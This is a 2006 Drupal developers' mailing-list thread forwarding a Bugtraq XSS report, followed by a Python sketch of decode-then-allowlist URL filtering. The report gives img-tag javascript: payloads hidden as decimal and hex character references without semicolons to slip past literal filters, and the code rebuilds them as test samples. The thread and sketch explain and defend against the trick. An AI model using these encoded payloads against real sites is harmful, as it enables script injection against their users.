[development] [liz0@bsdmail.com: Drupal all versiyon xss cehennem.org]

puregin puregin at puregin.org
Thu Jan 5 01:56:05 UTC 2006


As chx pointed out on bugtraq, and on this list,
this is not a vulnerability but a 'feature':
allowing full HTML in posting means
what it says.

Let's kill this topic.



On 4-Jan-2006, at 1:37 PM, Darrel O'Pry wrote:

> I tried to reproduce this, but was unable to... anyone else have any
> luck?
>
> On Tue, 2006-01-03 at 21:08 +0100, Piotr Krukowiecki wrote:
>> This is from bugtraq...
>>
>> email message attachment
>>> -------- Forwarded Message --------
>>> From: liz0 at bsdmail.com
>>> To: bugtraq at securityfocus.com
>>> Subject: Drupal all versiyon xss cehennem.org
>>> Date: 2 Jan 2006 10:45:25 -0000
>>>
>>> Drupal all versiyon xss
>>> ----------------------------------------------------
>>> site:http://www.drupal.org
>>>
>>> Hex, Base64, Decimal site: http://liz0zim.no-ip.org/code.php
>>> --------------------------------------------------
>>>
>>> img tag : on
>>>
>>> --------------------------------------------------------------------
>>>
>>> Decimal Value: HTML (without semicolons)
>>>
>>> <img src=javascript:alert('XSS')>  = <img src=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#39&#88&#83&#83&#39&#41>
>>> --------------------------------------------------------------------
>>> Decimal Value: HTML (with semicolons)
>>>
>>> <img src=javascript:alert('XSS')>  = <img src=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
>>>
>>>
>>> --------------------------------------------------------------------
>>> example:
>>> post message :<img src=javascript:alert('XSS')> not Vulnerable but <img src=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#39&#88&#83&#83&#39&#41> Vulnerable
>>>
>>> post message  :<img src=javascript:alert('XSS')> not Vulnerable but <img src=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> Vulnerable
>>>
>>>
>>> ---------------------------------------------------------
>>>
>>> Credit:Liz0ziM
>>> mail:liz0 at bsdmail.com
>>> www.biyo.tk , www.cehennem.org
>>>
>>> Gretz:wannacut,The_Bekir,Codexploder'tq,furtivo,R00t3rr0r,disconnect,cyberlord and all friend
>>>
>>> -----------------------------------------------------------
>>> Source:
>>>
>>> http://liz0zim.no-ip.org/drupal.txt
>>>
>>> ------------------------------------------------------------
>>>
>>>
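
The forwarded report contrasts a literal `javascript:` URL with the same string written as numeric character references without semicolons. The following is an added example, not code from this thread or from Drupal, showing the defensive ordering for any filter that does restrict markup: resolve character references first, then allowlist the URL scheme. The allowlist, attribute set and function names are assumptions made for illustration.

```python
import html
import re
from html.parser import HTMLParser

ALLOWED_SCHEMES = {"http", "https", "mailto"}  # assumed site policy
URL_ATTRS = {"src", "href"}                    # attributes checked in this sketch

def naive_blocks(raw_value):
    """Literal match on the raw attribute text, before any decoding."""
    return "javascript:" in raw_value.lower()

def scheme_of(decoded_value):
    """Scheme of an already entity-decoded URL, or None if it is relative."""
    # Drop whitespace/control characters, which browsers tolerate in the scheme.
    compact = re.sub(r"[\x00-\x20]+", "", decoded_value)
    match = re.match(r"([A-Za-z][A-Za-z0-9+.-]*):", compact)
    return match.group(1).lower() if match else None

def is_allowed(raw_value):
    """Decode character references first (semicolon optional), then allowlist."""
    scheme = scheme_of(html.unescape(raw_value))
    return scheme is None or scheme in ALLOWED_SCHEMES

class _UrlAttrAudit(HTMLParser):
    def __init__(self):
        super().__init__()
        self.rejected = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser hands over attribute values with references resolved.
        for name, value in attrs:
            if name in URL_ATTRS and value is not None:
                scheme = scheme_of(value)
                if scheme is not None and scheme not in ALLOWED_SCHEMES:
                    self.rejected.append((tag, name, scheme))

def rejected_url_attrs(markup):
    """Return (tag, attribute, scheme) for every URL attribute outside the allowlist."""
    audit = _UrlAttrAudit()
    audit.feed(markup)
    audit.close()
    return audit.rejected

# Constructed sample: the encoded forms from the report, built from the plain string.
PLAIN = "javascript:alert('XSS')"
DECIMAL = "".join("&#%d" % ord(c) for c in PLAIN)   # decimal, no semicolons
HEX = "".join("&#x%X" % ord(c) for c in PLAIN)      # hex, no semicolons
```

A literal match on the raw text catches only `PLAIN`; the decode-then-allowlist check rejects all three forms and still accepts relative and `http`/`https` URLs.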


